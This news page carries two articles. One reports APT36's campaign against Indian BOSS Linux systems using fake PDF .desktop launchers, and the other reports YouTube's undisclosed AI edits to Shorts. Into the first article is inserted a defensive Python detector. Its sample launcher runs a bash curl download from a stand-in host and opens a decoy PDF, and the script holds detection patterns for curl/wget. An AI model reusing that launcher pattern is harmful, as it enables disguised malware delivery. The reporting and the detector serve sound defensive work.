Fake Meeting Files Used In Cyber Espionage Campaign Against India

  • Written by Kiara Fabbri Former Tech News Writer
  • Fact-Checked by Sarah Frazier Former Content Manager

APT36 hackers from Pakistan have been found using weaponized shortcut files, phishing, malware, and 2FA theft to attack BOSS Linux systems in India.

In a rush? Here are the quick facts:

  • APT36 is targeting India’s BOSS Linux systems with fake .desktop files.
  • The malware downloads hidden payloads while showing a decoy PDF in Firefox.
  • Researchers linked the attack to Poseidon backdoor for spying and credential theft.

The Pakistan-based hacker group APT36, also known as Transparent Tribe, has started a new cyber-espionage operation against Indian government systems, according to research by CYFIRMA.

The group has created malware designed for India’s BOSS Linux operating system, demonstrating their growing capability to adapt to different environments.

The attack begins with spear phishing emails containing a file named “Meeting_Notice_Ltr_ID1543ops.pdf_.zip.” Once opened, it reveals a fake shortcut file called “Meeting_Ltr_ID1543ops.pdf.desktop.” Though it looks like a harmless PDF, the file is programmed to secretly download malicious software.

“The ‘.desktop’ file shown is crafted to masquerade as an ordinary PDF shortcut but contains a chain of commands embedded in its Exec= line that are executed automatically and sequentially as soon as the file is launched. This enables the attacker to perform covert actions while keeping the victim unaware,” the researchers explained.

The malware avoids notice by opening a genuine PDF in Firefox, which makes users believe nothing suspicious occurred.

Meanwhile, the hidden program runs in stealth mode, steals data, and sets itself to restart every time the computer is turned on.
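An added example, not CYFIRMA's or this article's own code: a static triage check for the launcher pattern described above (a .desktop file posing as a PDF whose Exec= line chains commands, downloads a payload and opens a decoy PDF). The regex heuristics and both sample entries are constructed assumptions; only the file name comes from the report.

```python
import re

# Heuristics derived from the behaviour described above; the patterns are assumptions.
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.desktop$", re.I)
EXEC_RULES = [
    ("Exec= invokes a shell", re.compile(r"\b(?:ba|da|z)?sh\s+-c\b")),
    ("Exec= chains several commands", re.compile(r";|&&|\|\||\||`|\$\(")),
    ("Exec= downloads from the network", re.compile(r"\b(?:curl|wget)\b")),
    ("Exec= opens a PDF in a browser (possible decoy)",
     re.compile(r"\b(?:firefox|xdg-open)\b[^;&|]*\.pdf\b", re.I)),
]

def parse_desktop_entry(text):
    """Return key/value pairs from the [Desktop Entry] group only."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
        elif in_group and "=" in line and not line.startswith("#"):
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry

def assess(filename, text):
    """List the reasons a launcher deserves manual review (empty list = none)."""
    exec_line = parse_desktop_entry(text).get("Exec", "")
    findings = ["document-style double extension"] if DOUBLE_EXT.search(filename) else []
    findings += [label for label, rx in EXEC_RULES if rx.search(exec_line)]
    return findings

# Constructed samples: hosts use the reserved .invalid TLD and fetch nothing real.
SUSPICIOUS = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Exec=bash -c "curl -s -o /tmp/sample https://files.example.invalid/sample; firefox https://files.example.invalid/notice.pdf"
Icon=application-pdf
Terminal=false
"""
BENIGN = """[Desktop Entry]
Type=Application
Name=Firefox
Exec=firefox %u
"""

if __name__ == "__main__":
    print(assess("Meeting_Ltr_ID1543ops.pdf.desktop", SUSPICIOUS))
    print(assess("firefox.desktop", BENIGN))
```

A hit is a reason to inspect the file by hand, not a verdict: legitimate launchers sometimes wrap a shell command, so tune the patterns against the launchers your fleet actually ships.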

The malicious files discovered by CYFIRMA connect to two newly registered domains, “securestore[.]cv” and “modgovindia[.]space”, which serve as command-and-control servers for the attackers. Through these servers, hackers can transmit commands and obtain stolen data while maintaining their access to government networks.

Hacker News reports that this campaign shows APT36’s growing sophistication. In addition to targeting BOSS Linux, the group has also developed Windows malware in the same campaign, demonstrating a dual-platform approach.

The malicious code performs system reconnaissance while executing fake anti-debugging and anti-sandbox checks to avoid detection, according to CloudSEK. The attacks led to the deployment of the Transparent Tribe backdoor Poseidon, which allows attackers to steal credentials, conduct long-term surveillance, and move laterally inside government networks, as reported by Hunt.io researchers.

Hacker News notes that this activity comes shortly after Transparent Tribe was caught targeting Indian defense organizations through spoofed login portals designed to steal credentials and even codes for Kavach, the Indian government’s two-factor authentication (2FA) system.

Victims entering their email and Kavach codes on the phishing sites unknowingly handed over login data directly to attackers.

CYFIRMA noted: “APT36’s capability to customize its delivery mechanisms according to the victim’s operating environment thereby increases its chances of success while maintaining persistent access to critical government infrastructure and evading traditional security controls.”

CYFIRMA warned that “the analysis indicates a coordinated cyber-espionage campaign attributed to APT36, leveraging weaponized .desktop files to target BOSS Linux environments within Indian Government entities.”

YouTube Secretly Used AI To Alter Creators’ Videos Without Permission

  • Written by Kiara Fabbri Former Tech News Writer
  • Fact-Checked by Sarah Frazier Former Content Manager

YouTube has admitted to quietly using AI to alter videos without telling creators, sparking concerns about trust and reality in online content.

In a rush? Here are the quick facts:

  • Subtle edits included sharpening, smoothing skin, and warping details.
  • Creators noticed strange changes.
  • YouTube confirmed AI tests on Shorts to “improve clarity.”

“I was like ‘man, my hair looks strange […] And the closer I looked it almost seemed like I was wearing makeup,” he said to the BBC, which first investigated this story. At first, he wondered if he was just imagining things. But he wasn’t.

In recent months, YouTube has used AI to sharpen images, smooth skin, and even warp ears in subtle ways. The modifications are difficult to detect when viewed on their own, but numerous content creators believe these changes produce an artificial appearance that resembles AI-generated content.

“The more I looked at it, the more upset I got […] If I wanted this terrible over-sharpening I would have done it myself. But the bigger thing is it looks AI-generated. I think that deeply misrepresents me and what I do and my voice on the internet. It could potentially erode the trust I have with my audience in a small way. It just bothers me,” says music YouTuber Rhett Shull, as reported by BBC.

Shull produced a video showcasing these changes.

After months of speculation, YouTube confirmed the edits were part of a test on Shorts. “We’re running an experiment on select YouTube Shorts that uses traditional machine learning technology to unblur, denoise and improve clarity in videos,” said Rene Ritchie, YouTube’s head of editorial and creator liaison, as reported by BBC.

But experts warn it’s more than just a technical tweak. “This case with YouTube reveals the ways in which AI is increasingly a medium that defines our lives and realities,” says Samuel Woolley of the University of Pittsburgh, as reported by BBC.

Woolley adds, “What happens if people know that companies are editing content from the top down, without even telling the content creators themselves?”